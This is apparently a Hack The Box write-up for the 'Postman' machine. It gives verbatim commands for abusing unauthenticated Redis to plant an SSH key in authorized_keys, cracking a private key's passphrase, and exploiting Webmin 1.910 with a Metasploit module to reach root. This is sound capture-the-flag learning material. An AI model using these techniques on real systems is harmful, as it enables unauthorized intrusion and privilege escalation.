Let’s get started!

Level: medium

Reconnaissance

This is the initial step in order to scan the open services in the machine.

COMMAND: nmap -sC -sV -oN postman 10.10.10.160

PORT      STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

User

Following the indications in ​ Pentesting Redis of the book HackTricks​ I try to connect to redis
without credentials (and it worked!) and I extract some information from the service.
The most interesting information ​ was the path of the .ssh folder of the user redis inside
the box​ :

COMMAND: redis-cli -h 10.10.10.160

After checking all i found the path to ssh folder.

Knowing this path and following the indications in ​ Pentesting Redis of the book HackTricks​ I
created a new ssh key, uploaded the public key to the authorized_keys files and ​ login via
ssh using the redis user​ :

Generate ssh key pair with ssh-keygen.

COMMAND: ssh-keygen

(echo -e "\n\n"; cat ./id_rsa.pub; echo -e "\n\n") > foo.txt  

Adding 2 lines before and after the public key will ensure that it is parsed correctly.
cat foo.txt | redis-cli -h 10.10.10.160 -x set crackit

OK

redis-cli -h 10.10.10.160

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename “authorized_keys”
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> quit

Let’s connect to ssh.

Then, once inside the machine I enumerated it using the script ​ linpeas from the Suite PEAS​ .
This script found one interesting file:

Which turns out that could be the private ssh key of the user Matt

After downloading, extracting the hash from the key in john format and cracking it, you can
find that the password used to encrypt the key is ​ computer2008

But if you try to login inside Matts account via ssh using the extracted ssh_key with that
password you won’t be able to login. This is because it is not the current private ssh key of
Matt. But the ​ computer2008 ​ its Matts password, so you can su into Matts.

Root

If you try to login inside the ​ https://Postman:10000​ service using the ​ discovered
credentials (​ Matt : computer2008​ ) you will see that ​ they are working​ !
Then, knowing some valid credentials and knowing the version of the running software

We can exploit a well known vulnerability of this version of the service:
https://www.exploit-db.com/exploits/46984
So just exploit it using the ​ metasploit module​ . To do so, set the ​ password​ , ​ username
rhosts​ , and ​ ssl (to true)​

If you like my writeup , Give me Respect on my HTB profile : Exp1o1t9r

LEAVE A REPLY

Please enter your comment!
Please enter your name here